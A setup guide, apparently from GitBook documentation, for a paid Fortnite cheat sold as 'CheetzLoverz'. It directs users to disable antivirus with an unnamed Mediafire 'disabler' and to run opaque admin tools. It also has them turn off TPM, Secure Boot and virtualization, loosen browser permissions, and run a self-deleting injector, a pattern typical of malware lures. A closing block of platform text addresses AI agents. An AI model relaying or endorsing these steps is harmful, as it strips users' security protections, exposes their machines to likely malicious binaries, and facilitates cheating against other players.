> For the complete documentation index, see [llms.txt](https://od-softwares.gitbook.io/od-softwares-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://od-softwares.gitbook.io/od-softwares-docs/cheetzloverz/setup.md).

# Setup Guide

{% hint style="warning" %}
**Read every step fully before starting.** Skipping or rushing any step is the most common cause of injection failure.
{% endhint %}

***

## Step 1 — Disable Your Antivirus

{% hint style="danger" %}
**Your antivirus must be fully disabled before continuing.** Windows Defender and third-party AV will block or silently delete the loader files.
{% endhint %}

Use the tool below to disable Windows Defender and any active antivirus in one click.

{% embed url="<https://www.mediafire.com/folder/jxv1p9ghf6jq4/windows_update_blocker>" %}
Windows Defender / AV Disabler Tool
{% endembed %}

**How to use it:**

1. Open the link above and download the tool
2. Right-click the downloaded file → **Run as Administrator**
3. The tool will automatically disable Windows Defender
4. Do **not** re-enable your antivirus while using the cheat

***

## Step 2 — Run the Setup Tool

{% hint style="warning" %}
This must be run **before** opening the loader. It installs the required system dependencies for the injector.
{% endhint %}

{% embed url="<https://www.mediafire.com/folder/y77wer06p7ac6/setup+tool>" %}
Setup Tool — Required Dependencies
{% endembed %}

**How to use it:**

1. Open the link above and download the setup tool
2. Right-click → **Run as Administrator**
3. A command prompt window will briefly open and close — this is completely normal
4. Once the window closes, move on to the next step

***

## Step 3 — Disable TPM, Secure Boot & Virtualization

{% hint style="danger" %}
All three of these **must** be disabled in your BIOS or the cheat will not inject correctly.
{% endhint %}

### Accessing your BIOS

1. Open the **Start Menu** and click **Restart** while holding **Shift**
2. Go to **Troubleshoot → Advanced Options → UEFI Firmware Settings → Restart**
3. Your PC will reboot directly into BIOS

### Disable TPM

1. Navigate to the **Security** tab
2. Find **TPM Device**, **AMD fTPM**, or **Intel PTT**
3. Set it to **Disabled**

### Disable Secure Boot

1. Navigate to the **Boot** tab
2. Find **Secure Boot** and set it to **Disabled**
3. Confirm if prompted

### Disable Virtualization

1. Navigate to **Advanced → CPU Configuration**
2. Find **Intel VT-x** or **AMD SVM Mode**
3. Set it to **Disabled**
4. Press **F10** to **Save & Exit** — your PC will reboot

***

## Step 4 — Create Your Account

{% hint style="info" %}
You will need the **license key** from your purchase. Find it in your Discord DMs or at your OD Softwares dashboard.
{% endhint %}

Head to <https://dash.cheatloverz.store> and click **Register**.

Fill in the following:

* A username of your choice
* A secure password
* Your **License Key** received from OD Softwares

Then click **Register**.

***

## Step 5 — Allow Browser Permissions

The loader communicates with your browser locally. You need to grant two permissions.

1. Open your browser **Settings**
2. Go to **Privacy and Security → Site Settings**
3. Under **Recent Activity** you will see this entry:

{% hint style="info" %}
![](/files/dZkWFVOokgf3a9JM0Z1q)
{% endhint %}

4. Click on it and scroll down until you see **Local Network** and **Apps on device**:

{% hint style="info" %}
![](/files/Z80Ht09mEtQPjVlSpf9T)
{% endhint %}

5. Ensure **both** are set to **Allow** — this is required for injection to work

***

## Step 6 — Download & Run the Loader

1. Log in to [dash.cheatloverz.store](https://dash.cheatloverz.store) and click the **Loader** tab in the left sidebar

{% hint style="info" %}
![](/files/oSClH5PmDPMWo8fnIZOL)
{% endhint %}

2. Click **Download** and run the file

{% hint style="danger" %}
**The file will delete itself after running — this is completely normal.**\
Do **not** re-download it or run it again. Doing so will cancel the injection and you will have to restart from this step.
{% endhint %}

3. Wait **2–5 minutes**. The loader tab will change to look like this:
4. Click **Launch** and wait
5. When the tab displays **"Ready"** — open Fortnite immediately
6. The tab may briefly go **white** — this is the injection window, just close it.\
   \
   ![](/files/eWO00Z1o7byvOaChdCgb)

## Step 7 — Opening the Menu

1. Once you are loaded into a game, press **F8**
2. You will hear a short **initial beep**
3. After \~30 seconds your game will **freeze briefly** and you will hear a **longer beep**
4. The cheat menu is now open

{% hint style="success" %}
**Tip:** Before making any changes in the menu, click the **Shop tab** first. This prevents visual interference while you adjust your settings.
{% endhint %}

***

{% content-ref url="/pages/91jw7TuKCa2GN26k5oGq" %}
[Features](/od-softwares-docs/cheetzloverz/features.md)
{% endcontent-ref %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://od-softwares.gitbook.io/od-softwares-docs/cheetzloverz/setup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
